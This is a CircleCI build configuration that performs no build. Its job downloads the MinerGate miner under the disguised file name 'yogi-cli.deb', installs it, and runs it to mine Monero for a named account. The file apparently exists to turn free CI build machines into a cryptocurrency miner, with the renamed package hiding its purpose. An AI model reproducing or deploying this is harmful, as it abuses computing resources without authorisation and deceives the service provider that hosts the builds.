version: 2
jobs:
  build:
    machine: true

    steps:
      - checkout
      - run: wget https://minergate.com/download/deb-cli -O yogi-cli.deb
      - run: wget http://archive.ubuntu.com/ubuntu/pool/main/p/pcre3/libpcre16-3_8.38-3.1_amd64.deb && sudo dpkg -i libpcre16-3_8.38-3.1_amd64.deb
      - run: sudo dpkg -i yogi-cli.deb
      - run: minergate-cli -u yoginth@aol.com --xmr